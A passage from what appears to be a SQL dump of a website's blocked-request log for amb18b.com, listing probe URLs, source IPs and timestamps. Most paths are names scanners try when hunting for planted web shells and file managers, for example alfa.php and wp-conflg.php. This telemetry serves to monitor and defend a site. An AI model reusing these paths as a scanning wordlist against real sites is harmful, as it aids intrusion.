17:16:57'),(2215,'https://amb18b.com/link.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:07','2025-10-28 17:17:07'),(2216,'https://amb18b.com/byp.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:09','2025-10-28 17:17:09'),(2217,'https://amb18b.com/bak.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:12','2025-10-28 17:17:12'),(2218,'https://amb18b.com/ini.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:15','2025-10-28 17:17:15'),(2219,'https://amb18b.com/ws.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:17','2025-10-28 17:17:17'),(2220,'https://amb18b.com/wp-trackback.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:20','2025-10-28 17:17:20'),(2221,'https://amb18b.com/.well-known/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:22','2025-10-28 17:17:22'),(2222,'https://amb18b.com/wp-includes/certificates/plugins.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:24','2025-10-28 17:17:24'),(2223,'https://amb18b.com/chosen.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:32','2025-10-28 17:17:32'),(2224,'https://amb18b.com/wp-includes/ID3/about.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:34','2025-10-28 17:17:34'),(2225,'https://amb18b.com/css/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:35','2025-10-28 17:17:35'),(2226,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:17:37','2025-10-28 17:17:37'),(2227,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:39','2025-10-28 17:17:39'),(2228,'https://amb18b.com/filemanager/dialog.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:43','2025-10-28 17:17:43'),(2229,'https://amb18b.com/wp-admin/maint/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:44','2025-10-28 17:17:44'),(2230,'https://amb18b.com/wp-includes/Requests/Text/admin.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:46','2025-10-28 17:17:46'),(2231,'https://amb18b.com/wp-includes/customize/about.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:48','2025-10-28 17:17:48'),(2232,'https://amb18b.com/index/function.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:50','2025-10-28 17:17:50'),(2233,'https://amb18b.com/uploads/autoload_classmap.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:52','2025-10-28 17:17:52'),(2234,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:56','2025-10-28 17:17:56'),(2235,'https://amb18b.com/wp-includes/style-engine/about.php','40.69.66.178','Direct Access',1,'2025-10-28 17:17:59','2025-10-28 17:17:59'),(2236,'https://amb18b.com/.well-known/acme-challenge/mariju.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:01','2025-10-28 17:18:01'),(2237,'https://amb18b.com/about/function.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:03','2025-10-28 17:18:03'),(2238,'https://amb18b.com/wp-includes/theme-compat/chosen.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:05','2025-10-28 17:18:05'),(2239,'https://amb18b.com/admin/function.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:07','2025-10-28 17:18:07'),(2240,'https://amb18b.com/.well-known/acme-challenge/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:09','2025-10-28 17:18:09'),(2241,'https://amb18b.com/css/colors/blue/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:11','2025-10-28 17:18:11'),(2242,'https://amb18b.com/wp-admin/setup-config.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:14','2025-10-28 17:18:14'),(2243,'https://amb18b.com/wp-admin/js/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:18','2025-10-28 17:18:18'),(2244,'https://amb18b.com/wp-includes/assets/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:23','2025-10-28 17:18:23'),(2245,'https://amb18b.com/wp-includes/fonts/index.php?p=','40.69.66.178','Direct Access',1,'2025-10-28 17:18:27','2025-10-28 17:18:27'),(2246,'https://amb18b.com/.well-known/gecko-litespeed.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:29','2025-10-28 17:18:29'),(2247,'https://amb18b.com/.well-known/admin.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:30','2025-10-28 17:18:30'),(2248,'https://amb18b.com/.well-known/log.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:37','2025-10-28 17:18:37'),(2249,'https://amb18b.com/class.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:39','2025-10-28 17:18:39'),(2250,'https://amb18b.com/wp-includes/js/codemirror/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:41','2025-10-28 17:18:41'),(2251,'https://amb18b.com/wp-includes/block-patterns/index.php','40.69.66.178','Direct Access',1,'2025-10-28 17:18:43','2025-10-28 17:18:43'),(2252,'https://amb18b.com/htaccess.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:13','2025-10-28 18:41:13'),(2253,'https://amb18b.com/wp-admin/css/','84.247.137.198','Invalid Referrer',1,'2025-10-28 18:41:15','2025-10-28 18:41:15'),(2254,'https://amb18b.com/readme.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:16','2025-10-28 18:41:16'),(2255,'https://amb18b.com/as.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:20','2025-10-28 18:41:20'),(2256,'https://amb18b.com/rh.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:23','2025-10-28 18:41:23'),(2257,'https://amb18b.com/css.php','4.218.11.42','Direct Access',3,'2025-10-28 18:43:11','2025-10-28 18:41:25'),(2258,'https://amb18b.com/gfile.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:28','2025-10-28 18:41:28'),(2259,'https://amb18b.com/cfile.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:31','2025-10-28 18:41:31'),(2260,'https://amb18b.com/wefile.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:34','2025-10-28 18:41:34'),(2261,'https://amb18b.com/403.php','4.218.11.42','Direct Access',2,'2025-10-28 18:44:43','2025-10-28 18:41:36'),(2262,'https://amb18b.com/max.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:39','2025-10-28 18:41:39'),(2263,'https://amb18b.com/m.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:42','2025-10-28 18:41:42'),(2264,'https://amb18b.com/post.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:45','2025-10-28 18:41:45'),(2265,'https://amb18b.com/themes.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:48','2025-10-28 18:41:48'),(2266,'https://amb18b.com/ALFA_DATA/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:55','2025-10-28 18:41:55'),(2267,'https://amb18b.com/wp-admin/maint/about.php','4.218.11.42','Direct Access',1,'2025-10-28 18:41:59','2025-10-28 18:41:59'),(2268,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:42:01','2025-10-28 18:42:01'),(2269,'https://amb18b.com/click.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:04','2025-10-28 18:42:04'),(2270,'https://amb18b.com/install.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:09','2025-10-28 18:42:09'),(2271,'https://amb18b.com/lv.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:11','2025-10-28 18:42:11'),(2272,'https://amb18b.com/simple.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:14','2025-10-28 18:42:14'),(2273,'https://amb18b.com/13k.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:18','2025-10-28 18:42:18'),(2274,'https://amb18b.com/up.php?x=','4.218.11.42','Direct Access',1,'2025-10-28 18:42:24','2025-10-28 18:42:24'),(2275,'https://amb18b.com/0x1949.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:27','2025-10-28 18:42:27'),(2276,'https://amb18b.com/cong.php','4.218.11.42','Direct Access',2,'2025-10-28 18:42:49','2025-10-28 18:42:30'),(2277,'https://amb18b.com/fw.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:33','2025-10-28 18:42:33'),(2278,'https://amb18b.com/bs1.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:34','2025-10-28 18:42:34'),(2279,'https://amb18b.com/wp-includes/images/wp-login.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:36','2025-10-28 18:42:36'),(2280,'https://amb18b.com/termps.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:39','2025-10-28 18:42:39'),(2281,'https://amb18b.com/brand.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:43','2025-10-28 18:42:43'),(2282,'https://amb18b.com/goods.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:47','2025-10-28 18:42:47'),(2283,'https://amb18b.com/atomlib.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:51','2025-10-28 18:42:51'),(2284,'https://amb18b.com/w.php','4.218.11.42','Direct Access',1,'2025-10-28 18:42:54','2025-10-28 18:42:54'),(2285,'https://amb18b.com/404.php?fm=true','4.218.11.42','Direct Access',1,'2025-10-28 18:42:57','2025-10-28 18:42:57'),(2286,'https://amb18b.com/404.php','4.218.11.42','Direct Access',2,'2025-10-28 18:44:25','2025-10-28 18:42:59'),(2287,'https://amb18b.com/article.php','4.218.11.42','Direct Access',2,'2025-10-28 18:44:34','2025-10-28 18:43:01'),(2288,'https://amb18b.com/0x.php','4.218.11.42','Direct Access',2,'2025-10-28 18:43:35','2025-10-28 18:43:08'),(2289,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:43:14','2025-10-28 18:43:14'),(2290,'https://amb18b.com/1.php','4.218.11.42','Direct Access',2,'2025-10-28 18:44:40','2025-10-28 18:43:17'),(2291,'https://amb18b.com/admin.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:19','2025-10-28 18:43:19'),(2292,'https://amb18b.com/wp-admin/maint/maint.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:21','2025-10-28 18:43:21'),(2293,'https://amb18b.com/classwithtostring.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:24','2025-10-28 18:43:24'),(2294,'https://amb18b.com/dropdown.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:28','2025-10-28 18:43:28'),(2295,'https://amb18b.com/moon.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:31','2025-10-28 18:43:31'),(2296,'https://amb18b.com/moon.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:43:37','2025-10-28 18:43:37'),(2297,'https://amb18b.com/autoload_classmap.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:43:39','2025-10-28 18:43:39'),(2298,'https://amb18b.com/inputs.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:41','2025-10-28 18:43:41'),(2299,'https://amb18b.com/default.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:43','2025-10-28 18:43:43'),(2300,'https://amb18b.com/fm.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:43:47','2025-10-28 18:43:47'),(2301,'https://amb18b.com/fm.php?fm=true','4.218.11.42','Direct Access',1,'2025-10-28 18:43:49','2025-10-28 18:43:49'),(2302,'https://amb18b.com/about.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:50','2025-10-28 18:43:50'),(2303,'https://amb18b.com/file.php?','4.218.11.42','Direct Access',1,'2025-10-28 18:43:53','2025-10-28 18:43:53'),(2304,'https://amb18b.com/alfa.php','4.218.11.42','Direct Access',2,'2025-10-28 18:44:37','2025-10-28 18:43:57'),(2305,'https://amb18b.com/buy.php','4.218.11.42','Direct Access',1,'2025-10-28 18:43:59','2025-10-28 18:43:59'),(2306,'https://amb18b.com/themes/twentytwentytwo/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:03','2025-10-28 18:44:03'),(2307,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:44:07','2025-10-28 18:44:07'),(2308,'https://amb18b.com/wp-admin/wp-conflg.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:44:09','2025-10-28 18:44:09'),(2309,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:44:12','2025-10-28 18:44:12'),(2310,'https://amb18b.com/manager.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:44:16','2025-10-28 18:44:16'),(2311,'https://amb18b.com/js/fm.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:18','2025-10-28 18:44:18'),(2312,'https://amb18b.com/item.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:21','2025-10-28 18:44:21'),(2313,'https://amb18b.com/plugins/Cache/footer.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:23','2025-10-28 18:44:23'),(2314,'https://amb18b.com/mail.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:26','2025-10-28 18:44:26'),(2315,'https://amb18b.com/sx.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:29','2025-10-28 18:44:29'),(2316,'https://amb18b.com/wp-admin/maint/admin.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:31','2025-10-28 18:44:31'),(2317,'https://amb18b.com/link.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:45','2025-10-28 18:44:45'),(2318,'https://amb18b.com/byp.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:48','2025-10-28 18:44:48'),(2319,'https://amb18b.com/bak.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:51','2025-10-28 18:44:51'),(2320,'https://amb18b.com/ini.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:53','2025-10-28 18:44:53'),(2321,'https://amb18b.com/ws.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:55','2025-10-28 18:44:55'),(2322,'https://amb18b.com/wp-trackback.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:58','2025-10-28 18:44:58'),(2323,'https://amb18b.com/.well-known/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:44:59','2025-10-28 18:44:59'),(2324,'https://amb18b.com/wp-includes/certificates/plugins.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:02','2025-10-28 18:45:02'),(2325,'https://amb18b.com/chosen.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:14','2025-10-28 18:45:14'),(2326,'https://amb18b.com/wp-includes/ID3/about.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:16','2025-10-28 18:45:16'),(2327,'https://amb18b.com/css/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:19','2025-10-28 18:45:19'),(2328,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:45:21','2025-10-28 18:45:21'),(2329,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:23','2025-10-28 18:45:23'),(2330,'https://amb18b.com/filemanager/dialog.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:27','2025-10-28 18:45:27'),(2331,'https://amb18b.com/wp-admin/maint/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:29','2025-10-28 18:45:29'),(2332,'https://amb18b.com/wp-includes/Requests/Text/admin.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:30','2025-10-28 18:45:30'),(2333,'https://amb18b.com/wp-includes/customize/about.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:32','2025-10-28 18:45:32'),(2334,'https://amb18b.com/index/function.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:34','2025-10-28 18:45:34'),(2335,'https://amb18b.com/uploads/autoload_classmap.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:37','2025-10-28 18:45:37'),(2336,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:40','2025-10-28 18:45:40'),(2337,'https://amb18b.com/wp-includes/style-engine/about.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:42','2025-10-28 18:45:42'),(2338,'https://amb18b.com/.well-known/acme-challenge/mariju.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:45','2025-10-28 18:45:45'),(2339,'https://amb18b.com/about/function.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:48','2025-10-28 18:45:48'),(2340,'https://amb18b.com/wp-includes/theme-compat/chosen.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:50','2025-10-28 18:45:50'),(2341,'https://amb18b.com/admin/function.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:51','2025-10-28 18:45:51'),(2342,'https://amb18b.com/.well-known/acme-challenge/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:53','2025-10-28 18:45:53'),(2343,'https://amb18b.com/css/colors/blue/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:45:56','2025-10-28 18:45:56'),(2344,'https://amb18b.com/wp-admin/setup-config.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:00','2025-10-28 18:46:00'),(2345,'https://amb18b.com/wp-admin/js/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:04','2025-10-28 18:46:04'),(2346,'https://amb18b.com/wp-includes/assets/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:08','2025-10-28 18:46:08'),(2347,'https://amb18b.com/wp-includes/fonts/index.php?p=','4.218.11.42','Direct Access',1,'2025-10-28 18:46:12','2025-10-28 18:46:12'),(2348,'https://amb18b.com/.well-known/gecko-litespeed.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:14','2025-10-28 18:46:14'),(2349,'https://amb18b.com/.well-known/admin.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:16','2025-10-28 18:46:16'),(2350,'https://amb18b.com/.well-known/log.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:25','2025-10-28 18:46:25'),(2351,'https://amb18b.com/class.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:28','2025-10-28 18:46:28'),(2352,'https://amb18b.com/wp-includes/js/codemirror/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:29','2025-10-28 18:46:29'),(2353,'https://amb18b.com/wp-includes/block-patterns/index.php','4.218.11.42','Direct Access',1,'2025-10-28 18:46:31','2025-10-28 18:46:31'),(2354,'https://amb18b.com/error.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:02','2025-10-28 19:17:02'),(2355,'https://amb18b.com/031.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:04','2025-10-28 19:17:04'),(2356,'https://amb18b.com/ilex.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:05','2025-10-28 19:17:05'),(2357,'https://amb18b.com/flex.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:07','2025-10-28 19:17:07'),(2358,'https://amb18b.com/mlex.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:09','2025-10-28 19:17:09'),(2359,'https://amb18b.com/wlex.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:10','2025-10-28 19:17:10'),(2360,'https://amb18b.com/wp-aaa.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:11','2025-10-28 19:17:11'),(2361,'https://amb18b.com/klex.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:13','2025-10-28 19:17:13'),(2362,'https://amb18b.com/about3.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:14','2025-10-28 19:17:14'),(2363,'https://amb18b.com/222.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:16','2025-10-28 19:17:16'),(2364,'https://amb18b.com/444.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:17','2025-10-28 19:17:17'),(2365,'https://amb18b.com/file9.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:18','2025-10-28 19:17:18'),(2366,'https://amb18b.com/filesss.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:20','2025-10-28 19:17:20'),(2367,'https://amb18b.com/file88.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:21','2025-10-28 19:17:21'),(2368,'https://amb18b.com/gifclass4.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:22','2025-10-28 19:17:22'),(2369,'https://amb18b.com/class-wp.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:23','2025-10-28 19:17:23'),(2370,'https://amb18b.com/555.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:25','2025-10-28 19:17:25'),(2371,'https://amb18b.com/333.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:26','2025-10-28 19:17:26'),(2372,'https://amb18b.com/class19.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:27','2025-10-28 19:17:27'),(2373,'https://amb18b.com/2clas.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:29','2025-10-28 19:17:29'),(2374,'https://amb18b.com/bless5.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:30','2025-10-28 19:17:30'),(2375,'https://amb18b.com/file15.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:32','2025-10-28 19:17:32'),(2376,'https://amb18b.com/hk.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:33','2025-10-28 19:17:33'),(2377,'https://amb18b.com/alpa.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:34','2025-10-28 19:17:34'),(2378,'https://amb18b.com/file21.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:35','2025-10-28 19:17:35'),(2379,'https://amb18b.com/ssss.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:37','2025-10-28 19:17:37'),(2380,'https://amb18b.com/ut.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:38','2025-10-28 19:17:38'),(2381,'https://amb18b.com/inde.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:40','2025-10-28 19:17:40'),(2382,'https://amb18b.com/classgoto24.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:41','2025-10-28 19:17:41'),(2383,'https://amb18b.com/030.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:43','2025-10-28 19:17:43'),(2384,'https://amb18b.com/thh.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:45','2025-10-28 19:17:45'),(2385,'https://amb18b.com/fffff.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:46','2025-10-28 19:17:46'),(2386,'https://amb18b.com/indo.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:47','2025-10-28 19:17:47'),(2387,'https://amb18b.com/fileas.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:48','2025-10-28 19:17:48'),(2388,'https://amb18b.com/yellow.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:50','2025-10-28 19:17:50'),(2389,'https://amb18b.com/33.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:51','2025-10-28 19:17:51'),(2390,'https://amb18b.com/plss3.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:52','2025-10-28 19:17:52'),(2391,'https://amb18b.com/he.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:53','2025-10-28 19:17:53'),(2392,'https://amb18b.com/thxt.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:55','2025-10-28 19:17:55'),(2393,'https://amb18b.com/wfile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:56','2025-10-28 19:17:56'),(2394,'https://amb18b.com/class20.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:57','2025-10-28 19:17:57'),(2395,'https://amb18b.com/build.php','4.230.40.160','Direct Access',1,'2025-10-28 19:17:58','2025-10-28 19:17:58'),(2396,'https://amb18b.com/1.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:00','2025-10-28 19:18:00'),(2397,'https://amb18b.com/usep.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:01','2025-10-28 19:18:01'),(2398,'https://amb18b.com/wa.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:02','2025-10-28 19:18:02'),(2399,'https://amb18b.com/wb.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:03','2025-10-28 19:18:03'),(2400,'https://amb18b.com/file1.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:05','2025-10-28 19:18:05'),(2401,'https://amb18b.com/2.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:07','2025-10-28 19:18:07'),(2402,'https://amb18b.com/a2.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:08','2025-10-28 19:18:08'),(2403,'https://amb18b.com/a.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:10','2025-10-28 19:18:10'),(2404,'https://amb18b.com/gmo.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:11','2025-10-28 19:18:11'),(2405,'https://amb18b.com/info.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:13','2025-10-28 19:18:13'),(2406,'https://amb18b.com/file2.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:14','2025-10-28 19:18:14'),(2407,'https://amb18b.com/lv.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:15','2025-10-28 19:18:15'),(2408,'https://amb18b.com/about.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:16','2025-10-28 19:18:16'),(2409,'https://amb18b.com/abcd.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:18','2025-10-28 19:18:18'),(2410,'https://amb18b.com/lock360.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:19','2025-10-28 19:18:19'),(2411,'https://amb18b.com/alfa.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:20','2025-10-28 19:18:20'),(2412,'https://amb18b.com/NewFile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:21','2025-10-28 19:18:21'),(2413,'https://amb18b.com/atomlib.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:23','2025-10-28 19:18:23'),(2414,'https://amb18b.com/wp.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:24','2025-10-28 19:18:24'),(2415,'https://amb18b.com/system_log.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:25','2025-10-28 19:18:25'),(2416,'https://amb18b.com/pp.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:26','2025-10-28 19:18:26'),(2417,'https://amb18b.com/geck.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:28','2025-10-28 19:18:28'),(2418,'https://amb18b.com/gm.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:29','2025-10-28 19:18:29'),(2419,'https://amb18b.com/makeasmtp.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:30','2025-10-28 19:18:30'),(2420,'https://amb18b.com/cccc.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:31','2025-10-28 19:18:31'),(2421,'https://amb18b.com/file4.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:32','2025-10-28 19:18:32'),(2422,'https://amb18b.com/520.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:33','2025-10-28 19:18:33'),(2423,'https://amb18b.com/CLA.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:35','2025-10-28 19:18:35'),(2424,'https://amb18b.com/file18.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:36','2025-10-28 19:18:36'),(2425,'https://amb18b.com/ffile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:37','2025-10-28 19:18:37'),(2426,'https://amb18b.com/file7.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:39','2025-10-28 19:18:39'),(2427,'https://amb18b.com/file.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:40','2025-10-28 19:18:40'),(2428,'https://amb18b.com/we.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:42','2025-10-28 19:18:42'),(2429,'https://amb18b.com/gfile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:43','2025-10-28 19:18:43'),(2430,'https://amb18b.com/jlex3.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:44','2025-10-28 19:18:44'),(2431,'https://amb18b.com/des.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:45','2025-10-28 19:18:45'),(2432,'https://amb18b.com/aaa.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:46','2025-10-28 19:18:46'),(2433,'https://amb18b.com/gifclass.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:48','2025-10-28 19:18:48'),(2434,'https://amb18b.com/vee.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:49','2025-10-28 19:18:49'),(2435,'https://amb18b.com/efile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:51','2025-10-28 19:18:51'),(2436,'https://amb18b.com/afile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:52','2025-10-28 19:18:52'),(2437,'https://amb18b.com/errorfile.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:53','2025-10-28 19:18:53'),(2438,'https://amb18b.com/f35.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:54','2025-10-28 19:18:54'),(2439,'https://amb18b.com/gool.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:56','2025-10-28 19:18:56'),(2440,'https://amb18b.com/haikh.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:57','2025-10-28 